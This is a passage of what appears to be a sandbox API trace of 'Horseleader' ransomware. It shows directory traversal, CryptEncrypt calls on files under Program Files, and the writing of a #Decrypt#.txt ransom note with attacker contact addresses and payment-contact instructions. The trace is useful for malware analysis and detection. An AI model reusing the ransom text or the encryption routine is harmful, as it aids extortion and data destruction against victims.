Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 81 [0251.873] StrStrIW (lpFirst="SportsScenesBackground.wmv", lpSrch=".horseleader") returned 0x0 [0251.873] lstrcmpW (lpString1="SportsScenesBackground.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.873] lstrcmpW (lpString1="SportsScenesBackground.wmv", lpString2="_uninstalling_.png") returned 1 [0251.873] lstrlenW (lpString=".testttjffg") returned 11 [0251.873] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv", lpSrch=".testttjffg") returned 0x0 [0251.874] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.874] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.874] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.874] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71789208, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71789208, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x524e6293, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2e59f4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SportsScenesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0251.874] lstrcmpiW (lpString1="SportsScenesBackground_PAL.wmv", lpString2="Windows") returned -1 [0251.874] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 85 [0251.874] StrStrIW (lpFirst="SportsScenesBackground_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.874] lstrcmpW (lpString1="SportsScenesBackground_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.874] lstrcmpW (lpString1="SportsScenesBackground_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.874] lstrlenW (lpString=".testttjffg") returned 11 [0251.874] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.874] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.874] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.874] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.874] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71384d39, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71384d39, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x23d2, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="sports_disc_mask.png", cAlternateFileName="")) returned 1 [0251.874] lstrcmpiW (lpString1="sports_disc_mask.png", lpString2="Windows") returned -1 [0251.874] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png") returned 75 [0251.875] StrStrIW (lpFirst="sports_disc_mask.png", lpSrch=".horseleader") returned 0x0 [0251.875] lstrcmpW (lpString1="sports_disc_mask.png", lpString2="#Decrypt#.txt") returned 1 [0251.875] lstrcmpW (lpString1="sports_disc_mask.png", lpString2="_uninstalling_.png") returned 1 [0251.875] lstrlenW (lpString=".testttjffg") returned 11 [0251.875] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png", lpSrch=".testttjffg") returned 0x0 [0251.875] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.875] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.875] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\sports_disc_mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sports_disc_mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.875] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71384d39, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71384d39, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ff68a0b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x23d2, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="sports_disc_mask.png", cAlternateFileName="")) returned 0 [0251.875] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.876] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\#Decrypt#.txt") returned 68 [0251.876] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.878] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.878] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.879] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.879] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.879] CloseHandle (hObject=0x158) returned 1 [0251.879] GetProcessHeap () returned 0x780000 [0251.879] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.879] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa198102e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa19a729d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Stacking", cAlternateFileName="")) returned 1 [0251.879] lstrcmpiW (lpString1="Stacking", lpString2="Windows") returned -1 [0251.879] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking") returned 56 [0251.880] lstrcmpW (lpString1="Stacking", lpString2=".") returned 1 [0251.880] lstrcmpW (lpString1="Stacking", lpString2="..") returned 1 [0251.880] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.880] GetProcessHeap () returned 0x780000 [0251.880] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.880] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\*") returned 58 [0251.880] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa198102e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa19a729d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.883] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.883] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\.") returned 58 [0251.883] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.883] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa198102e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa19a729d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.883] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.883] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\..") returned 59 [0251.883] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.883] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.884] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f740a33, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f740a33, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x540920df, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.884] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.884] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png") returned 74 [0251.884] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.884] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.884] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.884] lstrlenW (lpString=".testttjffg") returned 11 [0251.884] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.884] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.884] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.884] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.884] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f71a8d6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f71a8d6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5396df3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1928, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576_91n92.png", cAlternateFileName="")) returned 1 [0251.884] lstrcmpiW (lpString1="1047x576_91n92.png", lpString2="Windows") returned -1 [0251.884] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png") returned 75 [0251.884] StrStrIW (lpFirst="1047x576_91n92.png", lpSrch=".horseleader") returned 0x0 [0251.884] lstrcmpW (lpString1="1047x576_91n92.png", lpString2="#Decrypt#.txt") returned 1 [0251.884] lstrcmpW (lpString1="1047x576_91n92.png", lpString2="_uninstalling_.png") returned 1 [0251.885] lstrlenW (lpString=".testttjffg") returned 11 [0251.885] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png", lpSrch=".testttjffg") returned 0x0 [0251.885] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.885] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.885] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\1047x576_91n92.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\1047x576_91n92.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.885] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6ce61c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6ce61c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x544241af, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0251.885] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0251.885] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png") returned 69 [0251.885] StrStrIW (lpFirst="15x15dot.png", lpSrch=".horseleader") returned 0x0 [0251.885] lstrcmpW (lpString1="15x15dot.png", lpString2="#Decrypt#.txt") returned 1 [0251.885] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0251.885] lstrlenW (lpString=".testttjffg") returned 11 [0251.885] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png", lpSrch=".testttjffg") returned 0x0 [0251.885] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.885] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.885] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.886] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f740a33, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f740a33, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5444a30d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x15f4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="720x480icongraphic.png", cAlternateFileName="")) returned 1 [0251.886] lstrcmpiW (lpString1="720x480icongraphic.png", lpString2="Windows") returned -1 [0251.886] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png") returned 79 [0251.886] StrStrIW (lpFirst="720x480icongraphic.png", lpSrch=".horseleader") returned 0x0 [0251.886] lstrcmpW (lpString1="720x480icongraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.886] lstrcmpW (lpString1="720x480icongraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.886] lstrlenW (lpString=".testttjffg") returned 11 [0251.886] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.886] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.886] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.886] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720x480icongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720x480icongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.887] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6ce61c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6ce61c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5444a30d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x143e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="720_480shadow.png", cAlternateFileName="")) returned 1 [0251.887] lstrcmpiW (lpString1="720_480shadow.png", lpString2="Windows") returned -1 [0251.887] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png") returned 74 [0251.887] StrStrIW (lpFirst="720_480shadow.png", lpSrch=".horseleader") returned 0x0 [0251.887] lstrcmpW (lpString1="720_480shadow.png", lpString2="#Decrypt#.txt") returned 1 [0251.887] lstrcmpW (lpString1="720_480shadow.png", lpString2="_uninstalling_.png") returned 1 [0251.887] lstrlenW (lpString=".testttjffg") returned 11 [0251.887] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png", lpSrch=".testttjffg") returned 0x0 [0251.887] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.887] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.888] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\720_480shadow.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\stacking\\720_480shadow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.888] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7ff104, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f7ff104, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x54613375, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.888] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.888] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png") returned 89 [0251.888] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.888] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.888] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.888] lstrlenW (lpString=".testttjffg") returned 11 [0251.888] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Stacking\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.888] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.888] CryptEncrypt (in: hKey=0x7c65a0, 